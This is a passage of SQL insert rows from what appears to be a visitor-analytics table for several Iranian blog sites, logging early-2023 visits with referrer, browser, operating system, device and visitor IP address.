(28305,'2023-01-30','http://ictbank.ir/blog','Chrome','OS X','81.0.0.0','desktop','Macintosh','','101.199.254.199','000',0,1,0),
(28306,'2023-01-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28307,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.40','000',0,2,0),
(28308,'2023-01-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(28309,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.55.237','000',0,1,0),
(28310,'2023-01-30','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','194.25.158.132','000',0,1,0),
(28311,'2023-01-30','http://ictbank.ir/blog','Firefox','Windows','21.0','desktop','Unknown','','52.51.218.89','000',0,2,0),
(28312,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.212.157.29','000',0,2,0),
(28313,'2023-01-30','http://design-arena.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','192.71.30.89','000',0,1,0),
(28314,'2023-01-30','http://design-arena.ir/blog/','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','192.71.142.35','000',0,1,0),
(28315,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','84.54.70.48','000',0,3,0),
(28316,'2023-01-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(28317,'2023-01-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(28318,'2023-01-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(28319,'2023-01-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28320,'2023-01-30','http://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.119.81.97','000',0,2,0),
(28321,'2023-01-30','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.141','000',0,1,0),
(28322,'2023-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(28323,'2023-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(28324,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','5.188.62.26','000',0,2,0),
(28325,'2023-01-31','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(28326,'2023-01-31','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28327,'2023-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(28328,'2023-01-31','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.209.82.29','000',0,2,0),
(28329,'2023-01-31','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.152.84','000',0,2,0),
(28330,'2023-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28331,'2023-01-31','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(28332,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','144.126.200.81','000',0,4,0),
(28333,'2023-01-31','http://wikisonnati.com/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','109.106.137.188','000',0,2,0),
(28334,'2023-01-31','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(28335,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.18.62','000',0,2,0),
(28336,'2023-01-31','https://www.bing.com','Chrome','OS X','41.0.0.0','desktop','Macintosh','','83.240.221.24','000',0,20,0),
(28337,'2023-01-31','http://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(28338,'2023-01-31','http://ictbank.ir/blog','Chrome','OS X','79.0.0.0','desktop','Macintosh','','159.203.128.213','000',0,1,0),
(28339,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','165.227.120.72','000',0,2,0),
(28340,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','55.0.0.0','desktop','Unknown','','185.119.81.97','000',0,4,0),
(28341,'2023-01-31','http://ictbank.ir/blog','Chrome','Linux','108.0.0.0','desktop','Unknown','','44.227.127.2','000',0,2,0),
(28342,'2023-01-31','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(28343,'2023-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(28344,'2023-01-31','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(28345,'2023-01-31','https://www.google.com/','Chrome','Android','108.0.0.0','mobile:smart','Galaxy A70','','221.144.177.135','000',0,1,0),
(28346,'2023-01-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28347,'2023-01-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(28348,'2023-01-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28349,'2023-01-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(28350,'2023-01-31','http://wikisonnati.com/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','185.107.80.191','000',0,2,0),
(28351,'2023-01-31','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(28352,'2023-01-31','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(28353,'2023-01-31','http://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.250','000',0,2,0),
(28354,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,1,0),
(28355,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','42.83.147.34','000',0,2,0),
(28356,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','124.117.193.74','000',0,1,0),
(28357,'2023-01-31','http://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','111.162.145.181','000',0,1,0),
(28358,'2023-01-31','http://ictbank.ir/blog','QQ Browser','Windows','6.0','desktop','Unknown','','123.145.17.211','000',0,1,0),
(28359,'2023-01-31','http://ictbank.ir/blog','QQ Browser','Windows','6.0','desktop','Unknown','','60.13.6.100','000',0,1,0),
(28360,'2023-01-31','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.65','000',0,4,0),
(28361,'2023-01-31','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','58.211.23.183','000',0,4,0),
(28362,'2023-01-31','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','60.13.138.44','000',0,1,0),
(28363,'2023-01-31','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','110.52.217.5','000',0,1,0),
(28364,'2023-01-31','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','175.152.31.39','000',0,1,0),
(28365,'2023-01-31','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','112.112.212.228','000',0,1,0),
(28366,'2023-01-31','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(28367,'2023-01-31','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.118.89','000',0,2,0),
(28368,'2023-01-31','https://www.google.com/','Chrome','OS X','84.0.0.0','desktop','Macintosh','','151.237.185.211','000',0,1,0),
(28369,'2023-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28370,'2023-01-31','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,2,0),
(28371,'2023-02-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(28372,'2023-02-01','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','138.201.60.47','000',0,1,0),
(28373,'2023-02-01','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','118.195.194.27','000',0,2,0),
(28374,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','119.60.104.92','000',0,1,0),
(28375,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','1.202.113.25','000',0,1,0),
(28376,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','59.50.180.213','000',0,1,0),
(28377,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','150.255.89.182','000',0,1,0),
(28378,'2023-02-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.75.141.254','000',0,1,0),
(28379,'2023-02-01','http://ictbank.ir/blog','Chrome','Android','105.0.0.0','mobile:smart','Unknown','','212.102.35.27','000',0,1,0),
(28380,'2023-02-01','http://ictbank.ir/blog','Chrome','Linux','92.0.0.0','desktop','Unknown','','164.90.241.135','000',0,1,0),
(28381,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','128.90.63.73','000',0,1,0),
(28382,'2023-02-01','http://45.92.94.221/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','36.255.221.182','000',0,2,0),
(28383,'2023-02-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(28384,'2023-02-01','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.150.68','000',0,1,0),
(28385,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.160.95.179','000',0,1,0),
(28386,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','185.119.81.97','000',0,6,0),
(28387,'2023-02-01','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(28388,'2023-02-01','http://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28389,'2023-02-01','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.86.35','000',0,2,0),
(28390,'2023-02-01','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','100.26.5.3','000',0,2,0),
(28391,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.187.141.115','000',0,2,0),
(28392,'2023-02-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(28393,'2023-02-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(28394,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.35','000',0,2,0),
(28395,'2023-02-01','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.248.192','000',0,1,0),
(28396,'2023-02-01','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.101.111','000',0,1,0),
(28397,'2023-02-01','http://ictbank.ir/blog','Safari','OS X','7.0.0','desktop','Macintosh','','209.141.38.18','000',0,2,0),
(28398,'2023-02-01','http://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(28399,'2023-02-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(28400,'2023-02-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','107.191.63.227','000',0,1,0),
(28401,'2023-02-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(28402,'2023-02-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(28403,'2023-02-01','http://wikisonnati.com/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.223.197.100','000',0,5,0),
(28404,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','60.13.138.20','000',0,1,0),
(28405,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','218.95.234.99','000',0,1,0),
(28406,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','171.34.176.52','000',0,1,0),
(28407,'2023-02-01','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','111.85.200.197','000',0,1,0),
(28408,'2023-02-01','http://neginghavami.ir/blog','Opera','Windows','55.0.0.0','desktop','Unknown','','151.248.1.125','000',0,2,0),
(28409,'2023-02-01','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,7,0),
(28410,'2023-02-01','http://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','168.91.85.74','000',0,1,0),
(28411,'2023-02-01','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.38','000',0,1,0),
(28412,'2023-02-01','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.93','000',0,1,0),
(28413,'2023-02-01','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.117','000',0,1,0),
(28414,'2023-02-01','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.187.120','000',0,1,0),
(28415,'2023-02-02','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.146','000',0,2,0),
(28416,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','89.117.20.210','000',0,1,0),
(28417,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','76.164.198.173','000',0,6,0),
(28418,'2023-02-02','http://ns11.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.234','000',0,1,0),
(28419,'2023-02-02','http://ictbank.ir/blog','QQ Browser','Android','8.0','mobile:smart','Mate 10 Pro','','43.154.221.77','000',0,1,0),
(28420,'2023-02-02','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(28421,'2023-02-02','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.150.68','000',0,1,0),
(28422,'2023-02-02','http://ictbank.ir','Safari','OS X','12.0.0','desktop','Macintosh','','77.68.75.173','000',0,1,0),
(28423,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(28424,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','134.122.102.148','000',0,2,0),
(28425,'2023-02-02','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','36.88.30.172','000',0,2,0),
(28426,'2023-02-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(28427,'2023-02-02','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.192','000',0,1,0),
(28428,'2023-02-02','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.243','000',0,1,0),
(28429,'2023-02-02','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','64.124.51.154','000',0,2,0),
(28430,'2023-02-02','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(28431,'2023-02-02','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,5,0),
(28432,'2023-02-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(28433,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.191.39.166','000',0,2,0),
(28434,'2023-02-02','http://ictbank.ir/blog','Firefox Mobile','Android','10.0.0','mobile:smart','Unknown','','103.177.35.212','000',0,52,0),
(28435,'2023-02-02','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','173.35.4.66','000',0,4,0),
(28436,'2023-02-02','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','45.139.95.2','000',0,1,0),
(28437,'2023-02-02','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(28438,'2023-02-02','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.58','000',0,5,0),
(28439,'2023-02-02','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.236.155.241','000',0,5,0),
(28440,'2023-02-02','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,8,0),
(28441,'2023-02-02','http://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.135','000',0,1,0),
(28442,'2023-02-02','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,5,0),
(28443,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.27.73.215','000',0,1,0),
(28444,'2023-02-02','http://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(28445,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.70.120.33','000',0,2,0),
(28446,'2023-02-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(28447,'2023-02-02','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(28448,'2023-02-02','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,5,0),
(28449,'2023-02-02','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,4,0),
(28450,'2023-02-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(28451,'2023-02-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.119.6','000',0,1,0),
(28452,'2023-02-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,2,0),
(28453,'2023-02-02','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(28454,'2023-02-02','http://ictbank.ir/blog','Chrome','Windows','36.0.0.0','desktop','Unknown','','182.70.108.112','000',0,1,0),
(28455,'2023-02-02','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.32','000',0,5,0),
(28456,'2023-02-03','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','42.83.147.34','000',0,2,0),
(28457,'2023-02-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(28458,'2023-02-03','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(28459,'2023-02-03','http://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.138','000',0,2,0),
(28460,'2023-02-03','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','220.200.170.247','000',0,1,0),
(28461,'2023-02-03','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','144.255.18.134','000',0,1,0),
(28462,'2023-02-03','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(28463,'2023-02-03','https://www.google.com/','Chrome','Android','109.0.0.0','mobile:smart','Unknown','','110.224.17.243','000',0,2,0),
(28464,'2023-02-03','http://ictbank.ir/blog','Opera','Windows','89.0.0.0','desktop','Unknown','','38.15.148.207','000',0,9,0),
(28465,'2023-02-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.23','000',0,5,0),
(28466,'2023-02-03','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.128.248.16','000',0,1,0),
(28467,'2023-02-03','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.24','000',0,1,0),
(28468,'2023-02-03','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','183.83.184.240','000',0,4,0),
(28469,'2023-02-03','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,4,0),
(28470,'2023-02-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
(28471,'2023-02-03','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.92','000',0,1,0),
(28472,'2023-02-03','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','106.121.186.171','000',0,2,0),
(28473,'2023-02-03','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','117.33.227.207','000',0,1,0),
(28474,'2023-02-03','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(28475,'2023-02-03','http://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(28476,'2023-02-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(28477,'2023-02-03','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.200.177','000',0,2,0),
(28478,'2023-02-03','http://www.design-arena.ir/blog','Firefox','Windows','109.0','desktop','Unknown','','51.89.228.207','000',0,1,0),
(28479,'2023-02-03','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(28480,'2023-02-03','http://wikisonnati.com/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.192','000',0,1,0),
(28481,'2023-02-03','http://www.neginghavami.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.221.186.26','000',0,6,0),
(28482,'2023-02-03','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.32.19.45','000',0,2,0),
(28483,'2023-02-03','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(28484,'2023-02-03','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','109.66.2.57','000',0,4,0),
(28485,'2023-02-03','http://www.neginghavami.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.191.83','000',0,2,0),
(28486,'2023-02-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(28487,'2023-02-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28488,'2023-02-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(28489,'2023-02-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(28490,'2023-02-03','https://www.google.com/','Firefox','Ubuntu','109.0','desktop','Unknown','','82.14.221.101','000',0,1,0),
(28491,'2023-02-03','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','159.203.59.24','000',0,2,0),
(28492,'2023-02-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(28493,'2023-02-03','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','71.6.165.200','000',0,2,0),
(28494,'2023-02-03','http://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(28495,'2023-02-04','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','42.83.147.34','000',0,2,0),
(28496,'2023-02-04','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.128.205','000',0,2,0),
(28497,'2023-02-04','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','123.160.174.8','000',0,1,0),
(28498,'2023-02-04','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','171.37.173.32','000',0,1,0),
(28499,'2023-02-04','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','14.204.44.176','000',0,1,0),
(28500,'2023-02-04','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','112.66.101.190','000',0,1,0),
(28501,'2023-02-04','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,4,0),
(28502,'2023-02-04','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(28503,'2023-02-04','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(28504,'2023-02-04','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,2,0),
(28505,'2023-02-04','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.65','000',0,4,0),
(28506,'2023-02-04','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','178.208.165.133','000',0,2,0),
(28507,'2023-02-04','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(28508,'2023-02-04','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(28509,'2023-02-04','http://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','185.119.81.108','000',0,6,0),
(28510,'2023-02-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(28511,'2023-02-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(28512,'2023-02-04','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','107.23.80.148','000',0,1,0),
(28513,'2023-02-04','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(28514,'2023-02-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.30','000',0,4,0),
(28515,'2023-02-04','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(28516,'2023-02-04','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.70.241','000',0,2,0),
(28517,'2023-02-04','http://design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.251','000',0,1,0),
(28518,'2023-02-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,1,0),
(28519,'2023-02-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,2,0),
(28520,'2023-02-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(28521,'2023-02-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(28522,'2023-02-04','http://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','86.107.158.168','000',0,2,0),
(28523,'2023-02-04','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.189.210','000',0,1,0),
